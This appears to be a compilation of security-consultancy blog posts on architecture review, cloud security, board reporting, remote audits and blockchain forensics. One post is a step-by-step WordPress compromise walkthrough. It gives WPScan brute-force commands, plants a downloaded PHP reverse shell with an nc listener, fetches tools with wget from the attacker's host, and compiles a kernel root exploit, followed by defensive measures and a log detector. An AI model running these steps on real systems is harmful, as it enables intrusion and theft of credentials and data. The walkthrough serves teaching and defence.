
The cyber security threat landscape is evolving rapidly. Increasingly sophisticated attacks, multiple threat actors, strict security and privacy regulations, and new-age trends such as BYOD, remote working, growing cloud adoption and digital transformation initiatives are just some of the varied challenges that Information Security teams face. A shortage of skilled staff to manage these security responsibilities compounds the problem.

As news of more cyber-attacks arrives every week, Chief Information Security Officers (CISOs) are searching for solutions and measures to improve their organization's cyber security posture. Solution providers pitch various solutions and technologies to solve these challenges, and Information Security teams are assured that these solutions, with built-in next-gen features, can flag attempts to disrupt business, prevent attacks and minimize impact.

But multiple studies and industry surveys over the years have shown that procuring and implementing a solution does not mitigate the threat on its own. These implementations often run into high costs, a lack of skilled resources to manage the solution, poor or inadequate policy configuration, no integration with other solutions, insufficient supporting workflows and processes, and so on.

So, if just buying a solution and implementing is not enough, where does one start? The answer is Security Architecture Review — an activity that can help organizations understand their security threats and identify which solutions can mitigate these risks. The complex nature of the IT infrastructure of organizations today means that a thorough review is needed to identify the critical security risks and the solutions to address them. 

Security Architecture Review is a holistic review of security that covers networks, data, applications, endpoints, cloud, etc. It identifies gaps in your architecture, policies, and controls that may put your critical assets at risk from attackers.

So, what does a Security Architecture Review involve?

Study the organization’s Business, IT, and Security

Security Architecture Review begins with a study of the Business and IT environment of an organization and the key security and privacy requirements that are mandated by clients and regulations like GDPR, CCPA, PCI DSS, etc. Organizations wanting to adopt best practices can look at information security and data privacy standards and frameworks like NIST 800-53, ISO 27001, CSA STAR, etc. 

Identifying security and privacy risks is the next critical step as Information Security teams need to know what assets, applications, and processes need stringent controls and monitoring. 

Assess the current Security Architecture 

The next step is to study the existing network and security architecture, understand the extent of cloud adoption, assess the existing security solutions for design and implementation effectiveness, and identify gaps. We also recommend reviewing the configuration of key solutions: a product that is deployed but left on default policies provides far less protection than its feature list suggests.

Understand gaps across Security Domains 

After studying the architecture, assess the solutions currently implemented and their design effectiveness across security domains such as access control, patch management, monitoring, etc. This shows which security and privacy risks are actually addressed by the solutions in place, and which are not.

Build the Future State

After identifying the gaps, it is important to identify the right solutions to mitigate the gaps and address critical risks. Again, the solutions must address a few key criteria–risk mitigation, compliance management, integration with other solutions and interoperability, monitoring capabilities, and the ability to provide detailed reports as per organizational policies. 

While identifying solutions, one must also consider the state of the infrastructure–On-prem, cloud or hybrid. One must also look at security components that are provided by Cloud Service Providers. 

The end-state architecture must comprise solutions that offer protection from critical risks, integrate with other solutions deployed to provide relevant alerts and minimize the impact of any attack. Finally, one must also fortify the Information Security team with Subject Matter Experts (SMEs) who will manage the solutions. 

Benefits and Outcomes of Security Architecture Review
Conclusion

No matter how secure your organization's cyber defenses may be, a Security Architecture Review (SAR) can identify potential weaknesses and recommend countermeasures. The process begins with an assessment of your current security state, followed by the development of a roadmap for improvement.

A SAR is especially important in the current environment, where cloud services are increasingly adopted. The cloud is a distributed system that spans multiple data centers, providers and devices, which widens the attack surface, blurs ownership of controls between customer and provider, and increases the risk of data breaches.

Fortunately, many Cyber Security Companies in Bangalore offer SAR services. They can help you identify and mitigate vulnerabilities in your systems. Reach us for more information at [email protected]

Fifteen years ago, cloud infrastructure was a new and untested concept. Today it is the dominant form of data storage and computing services. With this shift, cybercriminals have also adapted their attacks, and smaller organizations are increasingly targeted. To prepare for the coming year, we have compiled 5 benefits of cloud infrastructure security in 2021.

Top 5 Benefits of Cloud Infrastructure Security 2021 

Comprehensive Security for All Devices  

All internet-connected devices should be protected by current cybersecurity controls. The rise of smart-home and IoT devices has created more potential points of entry for attackers. The cloud moves data from a centralized data center to a decentralized storage service, which changes the network security model: the perimeter is no longer the data center boundary. Cloud infrastructure security providers must therefore be able to protect not only corporate networks but individual users and devices as well, with a focus on privacy and control.

Easier to Scale  

Companies are realizing the benefits of cloud infrastructure. They are quicker to scale, cheaper to maintain, and more flexible. Many organizations are considering adoption due to these reasons. One thing to keep in mind is that all companies face new security threats as they move their operations into the cloud. If you don't already have a robust cybersecurity strategy in place, now's the time to make sure you're covered before jumping ship.  

Cost-Efficient  

Cloud infrastructure security may be the best option for companies looking to cut costs while improving their existing security measures. Public cloud computing has become an increasingly popular alternative to on-premises and private cloud deployments, offering lower upfront costs and elastic scalability, with capacity (and the security controls attached to it) scaled up and down as needed.

Improved Disaster Recovery Processes  

Disaster recovery processes have improved dramatically in recent years with the advent of cloud infrastructure security services. These services are cost-effective for businesses that are looking to grow, improve their customer retention rates, or want to reduce their capital expenses. These services affect all levels of the cloud infrastructure from firewalls and network security to data storage and encryption. In particular, the availability and affordability of cloud infrastructure security services have allowed companies to focus on their core business.  

Increased Innovation and Collaboration  

Economic growth has seen many benefits since the introduction of cloud infrastructure. One of the most prominent advantages is that it has helped to create jobs in the technology sector, which in turn has created more competition in an industry with high barriers to entry. Cloud data storage has allowed organizations to save money on hardware and operating expenses, while also allowing them to access their information anywhere they need it.  

Conclusion  

Cloud infrastructure security is a complex and diverse field. The number of IT professionals who specialize in it is growing quickly, but demand for qualified talent still outpaces supply. Organizations should make sure they have a comprehensive understanding of what cloud infrastructure security entails and how it adds value to their business.


Executive leaders and board members are ultimately responsible for the long-term security of their organization and for ensuring that cyber risks are mitigated. As board members realize how critical security and risk management is, they ask leaders more nuanced and complex questions. Interest in security and risk management (SRM) is at an all-time high at the board level. In Gartner's 2019 security and risk survey, four out of five respondents said that security risk influences decisions at the board level.

The Gartner research helps security and risk management leaders prepare for five categories of questions that they should be ready to answer at any executive or board-level meeting. Here are those questions.

Let’s discuss each of these in detail. 

The Trade-Off Question: Are we 100% secure?

The trade-off question is the one security and risk management leaders struggle with most. The question "Are we secure?" needs reframing; it is generally asked by board members who have not yet been educated about how security risk affects the business. It is impossible to prevent 100% of incidents. The CISO's responsibility is to help identify and evaluate the risks to the organization and allocate resources to manage them.

According to Gartner's report, a security and risk management leader in response to this question might say, 

"It is impossible to remove all sources of information risk, considering the evolving nature of the cyber threat landscape. My responsibility is to work with other parts of the business to execute controls for managing the security risks that could prevent us from improving operational efficiency and brand image. There is no such thing as 'perfect protection' in security. We have to continually reassess how much risk is appropriate as the business grows. We aim to develop a sustainable program that balances the need to protect against the need to run the business."

The Landscape Question: How bad is it out there?

Most board members want to know how their security compares with peer organizations. They read threat reports and blogs, listen to broadcasts, and are sometimes required by regulation to understand such matters. Gartner recognizes the need to discuss the landscape, but leaders should avoid quantifying risk, or attaching budget figures to mitigation costs, on the basis of external events alone. Benchmarks give some material for conversation, but they should be a negligible factor in the decision-making process.

Here are some responses that security and risk management leaders can give while discussing the wider security landscape. 

External event: Our primary competitor experienced a public, successful attack.
Response: We have a similar vulnerability that could facilitate the same attack, and we are addressing that weakness. Enhanced monitoring has been implemented.

External event: There is an increased number of attacks against the electricity grid in three of our national points of presence.
Response: We do not expect to become a direct target. Business continuity plans are being tested and updated to cope with a prolonged outage.

External event: We fall under the scope of the new EU General Data Protection Regulation requirements.
Response: We have conservative and cautious privacy practices in place.

The Risk Question: Do we know what our risks are?

A risk outside the tolerance needs treatment to bring it within tolerance. This does not usually require dramatic changes in a short time, so beware of overreacting. The Gartner report presents a way to defend the risk management decision, which you can adapt to your organization's risk tolerance.

One of the most common issues noted in the report is that risk evaluations are subjective and rest on a flawed methodology. Security leaders must have evidence to support their evaluation, even when they are not asked to present it. Another question is whether to present the typical outcome or the worst case. Most incidents have mild outcomes that are well within the ability of most companies to absorb; however, the infrequent incident can result in a catastrophic outcome, and the board should be aware of both.

The Performance Question: Are we appropriately allocating resources?

Security is always a moving target. The security team needs to demonstrate how it is performing to show that the organization stays safe. It is particularly important to establish whether resources are allocated appropriately and where the money is spent. The original strategy proposal should have margins for error on both deadline and budget; as long as overruns stay within these margins, they should be noncontroversial.

There may be valid reasons even if the overruns are outside the margins. The balanced scorecard approach is a way to understand how security contributes to business performance. In this approach, the top layer defines the business aspiration, and organization performance against those aspirations is expressed using a traffic light mechanism. However, it's not the only way. Some organizations have different types of dashboards to discuss business performance.  

The Incident Question: How did this happen?

Incidents are unavoidable, and handling one well can be a blessing in disguise. Security and risk management leaders should be aware that in some scenarios incident details may have to be tightly controlled (for example, because of legal or commercial sensitivities). A fact-based approach that explains what you know removes the mystery and gives the board confidence that you are in control of the incident. Acknowledge the incident, provide details of the business impact, outline the flaws or gaps that need to be worked on, and offer a mitigation plan.

Decipher Complex Board Questions

There are usually no deterministic answers to board questions, and responses are generally more about presenting options for sponsorship than a definitive course of action. The options vary with the context of the discussion, the maturity of the board, the communication skills of the SRM leader, and the frequency of reporting. Understanding and answering board questions requires everyone to understand their roles. The SRM leader should remember that the board's interest is in facilitating the business goal. Any query that may seem immature, ignorant, or complicated has a purpose behind it.

We wish you all a very happy 2021; may it be a year filled with success, good health, and happiness for you and your loved ones. With 2020 and the pandemic overwhelming us, we must be conscious of the increase in cyber security threats looming in front of us. Here are a few thoughts and considerations for the unenviable role of the CISO, for a great start to 2021!

Make the management part of your problem

Senior management does not know the technicalities of how a breach occurs, nor should they need to. They should, however, be clearly aware of the resulting risks. Ensure that senior management and the board are completely up to date on all open risks. Increase the frequency of meetings and provide a crisp update of the open risks and how you are working to mitigate them, with clear timelines and dependencies. Costs and budget overruns should be highlighted ahead of time. Bring in business-friendly and business-relevant cyber security metrics and report them periodically. This way management is more forthcoming in providing the necessary authority and helps prioritize your initiatives.

Get the appropriate budget

Various models exist for defining and allocating the budget: a percentage of IT spend, a percentage of the cost of a breach, a percentage of year-on-year business growth. Each has its benefits and pitfalls, but the budget should be commensurate with your risk appetite. Having management 'on board' with cyber security initiatives, as discussed above, goes a long way in ensuring that an appropriate budget is allocated. Let us be clear about one thing: the world expects 'more' with 'less'.

Clearly identify your security partners

Cyber security is one of the fields where the gap between the skills available and market needs is widening fastest. With a CAGR of 17% in cyber security products and services, this gap can quickly become the CISO's nightmare. Relying on experts to do the job is essential, and the problem can be solved by engaging the right ecosystem partners. Security technologies, security governance and security operations are niche areas, and picking the right partner ensures that they stay with you, provide the much-needed assurance, and bring the right skills to address your problem. Remember, it is not necessary to boil the ocean.

Evolve Your Security to Protect Your Remote Infrastructure

Secure your remote workforce by proactively protecting against zero-day malware and phishing, and consider both human and technological factors to avoid falling victim to phishing attacks. In response to the coronavirus pandemic, Gartner analysts observed a more than 400% increase in client inquiries related to remote access technologies in March, April and May 2020 compared with the previous three months. A recent Gartner survey also reveals that 41% of employees are likely to work remotely after the pandemic.

Continuous monitoring for all critical assets 

90% of breaches in cloud-based infrastructure have been attributed to configuration-related issues. Periodic assessment (once a year, once a quarter) is not sufficient in today's scenario; the new buzzword is continuous monitoring. Continuous monitoring of critical assets enables rapid detection of misconfigurations and security risks within the IT infrastructure that could lead to compliance violations. It gives visibility of changes to the infrastructure in near real time, and combined with a good threat intelligence feed it shortens the window in which a zero-day attack can go unnoticed.

Please reach out to us to know more about this to [email protected] or personally to me at [email protected].

Providing insights into the changed risk and opportunity landscape

The global situation relating to the COVID-19 pandemic has impacted businesses and has also impacted the work of auditors. It challenges the conventional methods adopted for an audit, and the current uncertainty and unpredictability may create risks of material misstatement in audits.


“Predicting the unpredictable: adapting to the changing needs” has always been a key mantra, and it holds true today with the emergence of COVID-19.

Considering the recent situation and the paradigm shift in business operations, CyRAACS advises audit teams to adopt the methods below for a precise, fact-based audit.

1. Re-evaluate the audit scope

With the change in the mode of business operations and the technology implemented, auditors may have to relook at the scope of the audit. Include the technology and architecture deployed to support remote working. Auditors may have to re-evaluate the effort estimates and timelines based on the changes in the scope of the audit.

2. Utilize Collaboration tools and communicate

Conference or video call facilities and collaboration tools such as Skype, Teams, Slack, etc. allow regular communication with clients and team members. Use them extensively to communicate what you need and what you have been working on. An additional point to note when adopting these communication and collaboration technologies is to keep an eye on the advisories issued for vulnerabilities identified in them, and to apply the fixes promptly. Any open-source tools adopted should be evaluated for security flaws before implementation.

3. Use cloud services for storing evidence

Utilize cloud storage services to collect audit evidence. Services like OneDrive and SharePoint enable gathering adequate, appropriate audit evidence remotely. Ensure that security controls (access restrictions, sharing limits, logging) are configured on the cloud service being used to prevent data leakage, and ensure that the platform is accessible to all stakeholders who need to provide data for the audit.

4. Technology controls to be stringently implemented by the IT Team

With the recent crisis and the work-from-home model adopted globally, the IT team may be implementing stricter controls such as digital certificates and multi-factor authentication for the environment. Auditors should include these additional security controls in their methodology to adapt to the changing environment.

5. Check for regulatory/contractual requirements for evidence sharing

All regulatory requirements for data hosting and data sharing should be validated before sharing data with the auditors. Where organizational policies on data sharing are strict, organizations may create a segregated environment or clean room in which the auditors can securely review the evidence.

6. Centralize work performed by other auditors

Centralize the audit engagement and the documentation on the cloud platform. This would enable the audit team to coordinate and review the work of auditors to meet the requirements in auditing and reporting standards.

7. Flexibility in reporting audit findings

As audit teams respond to the crisis and changing business risks in different ways, there may be a need for more adaptable and flexible auditing techniques. During this period, auditors need not be restricted to traditional reporting methods and may consider different reporting templates such as unrated reporting, e-mail reporting, and mid-review reporting.

8. Reassess key risks in a real-time environment

Risk changes rapidly with the slightest change in the environment. Re-Assess the current environment to identify the new threat landscape and associated risks. The exercise would give insights into the changing risk landscape and aid in developing a robust risk mitigation strategy.

Additional Articles for a good read and understanding of global security controls and audits:

1. NBS Special Publication 500-153: Guide to Auditing for Controls and Security: A System Development Life Cycle Approach

2. NIST Special Publication 800-53A: Assessing Security and Privacy Controls in Federal Information Systems and Organizations.

Introduction

WordPress is a free and open-source content management system (CMS) written in PHP, used by millions of sites across the globe. It is extended through plugins and themes.

Many vulnerabilities have been found in the plugins and themes used with WordPress, and one frequently quoted statistic puts 73.2% of the most popular WordPress installations as vulnerable. These weaknesses can be identified with automated tools and exploited. This blog walks through one example in which an adversary obtains an administrator password by brute force, uses the built-in theme editor to plant a PHP reverse shell, and then escalates to root through an unpatched kernel.


Below are the steps, from enumeration to root, against a host running WordPress with the built-in theme editor enabled:

Nmap Enumeration

Run an Nmap service scan to discover the open ports and services running on the target host.

Nmap reveals an HTTP service on port 80, and the directories discovered by the http-enum script point to a WordPress login page.

WordPress Login Panel

Browse to the WordPress login page at http://*target IP*/wp-login.php as shown in the screenshot below:

To retrieve a username and password we use WPScan, a scanner built for enumerating WordPress installations (users, plugins, themes) and brute-forcing WordPress credentials.

WordPress enumeration using WPScan

First run a user enumeration scan to discover the accounts registered on the site:

wpscan --url http://*target IP* --enumerate u

The user enumeration scan reveals the usernames of the users linked with WordPress account as shown in the screenshot below:

Run a Bruteforce scan

Now that we have a username, run a brute-force scan to find the admin account's password (WPScan 3.x syntax; older 2.x releases used --wordlist instead of --passwords):

wpscan --url http://*target IP* --passwords /root/rockyou.txt --usernames admin

As shown in the screenshot below, the brute-force scan finds the admin account's password: princess.

Using the credentials obtained, log in to the WordPress site and navigate to the Themes section. Plugins and themes are the usual weak points of a WordPress site, and the built-in file editor lets anyone with administrator rights write arbitrary PHP into them.

WordPress Theme Engine

After login, navigate to Appearance > Theme Editor.

The editor lists the theme's template files (archive.php, index.php, and so on) as editable .php files. Any of them can be overwritten with a PHP reverse shell; in this example we use archive.php.

Replace the contents of archive.php with the PHP reverse shell.

PHP reverse shell to gain a local shell

In this case we use the PHP reverse shell from pentest monkey.

Run the command below to download it:

wget http://pentestmonkey.net/tools/web-shells/php-reverse-shell/php-reverse-shell-1.0.tar.gz

Extract the archive with tar -xzf php-reverse-shell-1.0.tar.gz and paste the contents of php-reverse-shell.php into archive.php in the browser.

Edit the $ip and $port variables near the top of the script so that they point to the attacking system's IP and listener port, as shown in the screenshot below:

Click Update File at the bottom of the page; the file is saved with the PHP reverse shell code in place of the original template.

Gaining local user access

Now open a new terminal and start a netcat listener on port 443, the port specified in the PHP reverse shell script:

nc -nvlp 443

Then request the modified archive.php directly in the browser:

http://*target IP*/wp-content/themes/twentytwelve/archive.php

As shown in the screenshot below, requesting the modified archive.php makes the web server execute it, and the listener receives a reverse shell connecting from the victim back to the attacking system.

This gives low-privilege access as the web server user "www-data".

The next step is to elevate the privilege and get root access.

Let us run the linuxprivchecker.py script to enumerate system information and check for world-writable files and other escalation paths.

To transfer the file from the attacker's system to the target, start a simple HTTP server on the attacker's machine (the command below is for Python 2; under Python 3 the equivalent is python3 -m http.server 80):

python -m SimpleHTTPServer 80

Checking file permissions using Privchecker

Download linuxprivchecker.py into the /tmp directory on the target using the command below:

wget http://*local IP*/linuxprivchecker.py

The enumeration output confirms the kernel version and that /tmp is writable by www-data (as it is by design on most Linux systems), which gives us a place to stage the exploit.

Local Privilege Escalation

The enumeration shows the kernel is Linux 2.6.32. From Exploit-DB we download the C exploit titled Linux Kernel < 2.6.36-rc1 (Ubuntu 10.04 / 2.6.32) - 'CAN BCM' Local Privilege Escalation (file 14814.c).

Download the source into the writable /tmp directory identified during enumeration.

A version string alone does not guarantee the exploit works: distribution kernels often carry backported fixes without a version bump, the exploit needs the CAN BCM socket support to be available, and a failed kernel exploit can crash the target. On a real engagement, confirm the kernel is unpatched and agree the risk with the client before running it.

Compile the source and save the output as rootpriv:

gcc 14814.c -o rootpriv

Now run it with ./rootpriv.

Gaining Root Access

Once the exploit has run, check the current user with whoami.

We now have a root shell, as shown in the screenshot below:

List the files in /root.

There is an interesting file, wp.sql, a dump of the WordPress database with all its tables and values. A full WordPress dump includes the wp_users table with password hashes, which an attacker could crack offline or reuse against other systems. Below are the contents of wp.sql:

This blog has shown how a weak administrator password, the built-in WordPress theme editor, and an unpatched kernel combine to give an attacker root on the host.

There are many other weaknesses in WordPress deployments that can be used to elevate privilege and retrieve sensitive information.

Preventive measures

Below are the measures you can adopt to keep your WordPress site secure:

1.   Sucuri Scanner

Install and use WordPress security plugin – Sucuri Scanner.

Set up auditing and monitoring that keeps track of everything that happens on the website: file integrity monitoring, failed login attempts, malware scanning, etc. In the attack above, the burst of failed logins, the brute-forced admin login and the theme file edit would all have been visible to such monitoring.

The best part about Sucuri’s firewall is that it also comes with a malware cleanup and blacklist removal guarantee. Basically, if you were to be hacked under their watch, they guarantee that they will fix your website (no matter how many pages you have).

2.   Change the Default “admin” username.

In the old days, the default WordPress admin username was "admin". Since a username is half of the login credentials, this made brute-force attacks easier. Note that WPScan's user enumeration can still recover non-default usernames from author pages and the REST API, as the enumeration step above shows, so renaming the account should be combined with blocking user enumeration and rate-limiting logins.

Since WordPress does not allow you to change usernames from the admin screen, there are three methods you can use to change the username.

3.   Disable File Editing

WordPress comes with a built-in code editor that allows you to edit theme and plugin files from the admin area. In the wrong hands this feature is a security risk (it is exactly how the reverse shell was planted above), which is why we recommend turning it off by setting the DISALLOW_FILE_EDIT constant to true in wp-config.php. This removes the editor from the dashboard, so an attacker holding admin credentials needs another route to write PHP to the server.

4. Add Two Factor Authentication

The two-factor authentication technique requires users to log in by using a two-step authentication method. The first one is the username and password, and the second step requires you to authenticate using a separate device or app.

Most top online websites like Google, Facebook, Twitter, allow you to enable it for your accounts. You can also add the same functionality to your WordPress site.

5.   Strong Passwords and User Permissions

Many systems and applications include functionality that prevents a user from setting a password that does not meet certain criteria; use it to ensure only strong passwords are set. The admin password in the example above (princess) is in every common wordlist and fell to a dictionary attack. Also give each user only the role they need: a site whose only administrator account is shared is one brute-forced password away from full compromise.

6. Keep WordPress Updated

WordPress is open-source, so anyone can study its code, including attackers looking for flaws, and published vulnerabilities in plugins and themes are weaponized quickly. Make sure that all your plugins, themes, and the WordPress core itself are kept up to date.

7.   Disable Directory Indexing and Browsing

Directory browsing lets attackers list your files and spot ones with known vulnerabilities to exploit. It also lets anyone inspect your files, copy images, and learn your directory structure. It is therefore highly recommended to turn directory indexing and browsing off (on Apache, the Options -Indexes directive; on nginx, autoindex off).
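To tie the walkthrough and the preventive measures together, here is an added example (not from the original post and not WordPress project code) of what the attack chain above looks like from the defender's side. It is a small Python script that scans web server access-log lines for the footprint of each stage: author-ID and REST user enumeration, password guessing against wp-login.php, a write through theme-editor.php, and a theme template being requested directly, which is what triggers the reverse shell. The log lines, IP addresses, timestamps and user-agent strings are constructed for the example; the URL paths are the real WordPress endpoints.

```python
import re
from collections import Counter, defaultdict

# Apache/nginx "combined" log format: we only need the client IP, the request
# method and path, and the status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample log (not real traffic). 10.0.0.5 plays the attacker from
# the walkthrough; 10.0.0.9 is an ordinary user who logs in once.
_ATTACKER, _USER = "10.0.0.5", "10.0.0.9"


def _line(ip, method, path, status, ts, ua):
    return f'{ip} - - [01/Jan/2021:10:{ts} +0000] "{method} {path} HTTP/1.1" {status} 0 "-" "{ua}"'


_lines = [
    # Stage 1: user enumeration, the way "wpscan --enumerate u" probes a site
    _line(_ATTACKER, "GET", "/?author=1", 301, "00:01", "scanner"),
    _line(_ATTACKER, "GET", "/?author=2", 404, "00:01", "scanner"),
    _line(_ATTACKER, "GET", "/wp-json/wp/v2/users/?per_page=100", 200, "00:02", "scanner"),
]
# Stage 2: 25 password guesses against the login form, one per second
_lines += [_line(_ATTACKER, "POST", "/wp-login.php", 200, f"01:{s:02d}", "scanner") for s in range(25)]
_lines += [
    # A legitimate single login from another client
    _line(_USER, "POST", "/wp-login.php", 302, "01:30", "Mozilla/5.0"),
    # Stage 3: archive.php overwritten through the built-in theme editor
    _line(_ATTACKER, "POST", "/wp-admin/theme-editor.php", 302, "02:00", "Mozilla/5.0"),
    # Stage 4: the modified template requested directly to fire the reverse shell
    _line(_ATTACKER, "GET", "/wp-content/themes/twentytwelve/archive.php", 200, "02:05", "Mozilla/5.0"),
]
SAMPLE_LOG = "\n".join(_lines) + "\n"

THEME_PHP_RE = re.compile(r"^/wp-content/themes/[^/]+/.*\.php$")


def parse(log_text):
    """Yield one dict per well-formed line; lines that do not match are skipped."""
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            rec = m.groupdict()
            rec["status"] = int(rec["status"])
            yield rec


def analyze(log_text, login_threshold=10):
    """Return {finding: sorted list of client IPs} for the four stages above."""
    login_posts = Counter()
    findings = defaultdict(set)
    for r in parse(log_text):
        ip, method, status = r["ip"], r["method"], r["status"]
        path = r["path"].split("?", 1)[0]
        query = r["path"][len(path):]
        # Username enumeration: author-ID redirects or the REST users endpoint
        if (path == "/" and query.startswith("?author=")) or path.startswith("/wp-json/wp/v2/users"):
            findings["user_enum"].add(ip)
        # Password guessing: count POSTs to the login form per client
        if method == "POST" and path == "/wp-login.php":
            login_posts[ip] += 1
        # Code written through the theme/plugin editor (the edited file name is
        # in the POST body, which access logs do not record)
        if method == "POST" and path == "/wp-admin/theme-editor.php":
            findings["theme_editor_write"].add(ip)
        # A theme template fetched directly: WordPress includes these files
        # itself, so a successful direct request is unusual
        if method == "GET" and status == 200 and THEME_PHP_RE.match(path):
            findings["direct_theme_php"].add(ip)
    for ip, n in login_posts.items():
        if n >= login_threshold:
            findings["login_bruteforce"].add(ip)
    return {k: sorted(v) for k, v in findings.items()}


if __name__ == "__main__":
    for finding, ips in analyze(SAMPLE_LOG).items():
        print(f"{finding}: {', '.join(ips)}")
```

Two caveats for real use: WordPress does not log failed logins on its own, so the web server log (or a security plugin) is the data source, and a patient attacker spreads guesses over time and source addresses, so the threshold should be applied per time window and combined with account-level lockout. Setting DISALLOW_FILE_EDIT as recommended above removes stage 3 entirely, which is cheaper than detecting it.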

Introduction

Blockchain is an emerging technology that is popular nowadays because of the popularity of cryptocurrency. Apart from its use in cryptocurrency, it is also marketed as a cure for many things, including cybersecurity. Blockchain is considered a nearly impenetrable technology because, by design, it is resistant to modification of its data. A blockchain is a list of records, or blocks, linked using cryptography. Each block contains information that is combined and verified: the cryptographic hash of the previous block, a timestamp, and transaction details are permanently recorded in a distributed ledger. The ledger is decentralized; all transactions take place across a peer-to-peer network. Blockchain technology is designed so that there is no central authority or storage location. Every user on the network plays a part in storing some or all of the blockchain, and everyone is responsible for verifying the data that is stored and shared, so that false data cannot be added and existing data cannot be removed.

Blockchain technology has been around for more than a decade. It was invented by a person using the name Satoshi Nakamoto in 2008 to serve as the public transaction ledger of the cryptocurrency bitcoin. As the technology has gradually spread worldwide, people have begun using it in a variety of ways in numerous industries, including as a means to increase cybersecurity. A blockchain is a chain of records that forms a distributed network, which can have millions of users all over the world. Every user can add information to the blockchain, and all data in the blockchain is secured through cryptography. Every other member of the network is responsible for verifying that the data being added is genuine. This is done using a system of three keys (private, public, and the receiver’s key) that lets members check the veracity of the data while also confirming whom it comes from. The verified data then forms a block that is added to the chain. To update a particular piece of data, the owner of that data must add a new block on top of the previous one, extending a very specific chain of blocks.

Blockchain Implementation in Cyber Forensics

Unauthorized access to a network can lead to data being stolen or damaged, so it is essential for an individual or organization to detect the intrusion. How evidence is collected and preserved plays a significant role in ensuring that it holds up in court, whether in a lawsuit or a criminal complaint.

Identifying the attack or breach and generating the required documentation about the causes of a cyber-attack or cyber fraud can be made accountable through the use of blockchain technology. Truth-based evidence is always important in any cybercrime investigation. Digital evidence moves down the hierarchy through the chain of custody at the different levels of transactions in an investigation. Blockchain technology can provide a clear and exhaustive view of the transactions that have taken place concerning the evidence, right from the time it originated from the source [2].

There are many reported cases of missing police evidence, and several of them go unaccounted for, giving criminals an easy way out; this too can be prevented using blockchain technology. It can grant appropriate authorization to those who are permitted to enter the evidence room, whether electronic, magnetic, or by using private keys. The scientific approach in digital forensics flows through the search authorities, the chain of custody of evidence, imaging and hashing, validation of data using appropriate tools, reportability, and repeatability of presentation. The entire process can be made data-centric using blockchain technology.

Hash validation against the blockchain, together with the timestamp, prevents duplication and contamination of information. Keeping a clear and unique record of who accessed what and when helps avoid contamination of evidence and information. A blockchain-based application can be used to ensure proper operating practice in evidence management. Necessary questions, such as how the core data is stored, how it is communicated, who is responsible for handling the data, and what factors contribute to its physical security, can all be streamlined efficiently. Principles such as working with the duplicate copy rather than the original can be validated using the hash: the hash function takes the data and generates a fixed-size bit sequence as output, thus creating a digital fingerprint of the input data.
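As an added example (not code from the original post), the hash-linked, timestamped record-keeping described above applied to a forensic chain of custody: each custody event commits to the previous block’s hash, editing an earlier record breaks the link at or after that block, and a working copy is validated against the fingerprint recorded at seizure. The handlers, timestamps and evidence bytes are constructed for the example.

```python
import hashlib
import json
from dataclasses import dataclass, replace
from typing import List, Optional

GENESIS_PREV = "0" * 64  # the first block has no predecessor to link to


def fingerprint(data: bytes) -> str:
    """SHA-256: a fixed-size bit sequence that serves as the digital fingerprint of the input."""
    return hashlib.sha256(data).hexdigest()


@dataclass(frozen=True)
class CustodyBlock:
    index: int
    timestamp: str      # ISO 8601, passed in by the caller so the chain is reproducible
    handler: str        # who handled the evidence
    action: str         # seized, imaged, transferred, analysed, ...
    evidence_hash: str  # fingerprint of the evidence at the time of this action
    prev_hash: str      # fingerprint of the previous block: the cryptographic link
    block_hash: str     # fingerprint of all the fields above


def block_digest(index: int, timestamp: str, handler: str, action: str,
                 evidence_hash: str, prev_hash: str) -> str:
    # Canonical JSON so that identical fields always produce the same digest
    payload = json.dumps([index, timestamp, handler, action, evidence_hash, prev_hash],
                         separators=(",", ":")).encode()
    return fingerprint(payload)


class CustodyChain:
    def __init__(self) -> None:
        self.blocks: List[CustodyBlock] = []

    def record(self, timestamp: str, handler: str, action: str, evidence: bytes) -> CustodyBlock:
        """Append a custody event; the new block commits to the previous block's digest."""
        index = len(self.blocks)
        prev_hash = self.blocks[-1].block_hash if self.blocks else GENESIS_PREV
        evidence_hash = fingerprint(evidence)
        digest = block_digest(index, timestamp, handler, action, evidence_hash, prev_hash)
        block = CustodyBlock(index, timestamp, handler, action, evidence_hash, prev_hash, digest)
        self.blocks.append(block)
        return block

    def first_invalid_block(self) -> Optional[int]:
        """None if every digest and back-link checks out, else the index of the first failing block."""
        expected_prev = GENESIS_PREV
        for b in self.blocks:
            recomputed = block_digest(b.index, b.timestamp, b.handler, b.action,
                                      b.evidence_hash, b.prev_hash)
            if b.prev_hash != expected_prev or b.block_hash != recomputed:
                return b.index
            expected_prev = b.block_hash
        return None

    def working_copy_is_faithful(self, copy: bytes) -> bool:
        """Analysts work on a duplicate; trust it only if it hashes to the original recorded at seizure."""
        return bool(self.blocks) and fingerprint(copy) == self.blocks[0].evidence_hash


def build_sample_chain() -> CustodyChain:
    """Constructed sample: three custody events over one (constructed) disk image."""
    image = b"constructed disk image bytes for the example"
    chain = CustodyChain()
    chain.record("2020-10-01T09:00:00Z", "Officer A", "seized", image)
    chain.record("2020-10-01T11:30:00Z", "Examiner B", "imaged", image)
    chain.record("2020-10-02T08:15:00Z", "Analyst C", "analysed", image)
    return chain


def tamper(chain: CustodyChain, index: int, new_handler: str, rehash: bool) -> Optional[int]:
    """Rewrite who handled the evidence at one step (on a copy) and report where verification fails.

    Without rehashing, the edited block's own digest no longer matches, so it fails at `index`.
    With rehashing, the edited block looks self-consistent, but the next block still carries the
    old digest as its prev_hash, so the break surfaces at index + 1. A rehashed edit of the LAST
    block is not caught by the chain alone; that is why every node keeps a copy of the ledger.
    """
    forged = CustodyChain()
    forged.blocks = list(chain.blocks)
    b = forged.blocks[index]
    digest = (block_digest(b.index, b.timestamp, new_handler, b.action, b.evidence_hash, b.prev_hash)
              if rehash else b.block_hash)
    forged.blocks[index] = replace(b, handler=new_handler, block_hash=digest)
    return forged.first_invalid_block()
```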

Blockchain Implementation in Cyber Security

As the number of people joining the world wide web keeps growing and technology develops at a very fast rate, more data is produced and more hackers will attempt to steal or corrupt that data. The technology behind blockchain is flexible and very helpful for the future of the Internet, allowing users to better secure their data. Innovative uses for blockchain technology are already becoming part of fields beyond cryptocurrencies and can be especially useful in boosting cybersecurity. Implementing blockchain can help prevent many threats and attacks on a system and can keep information from being stolen or destroyed. Some of the things blockchain can help with are:

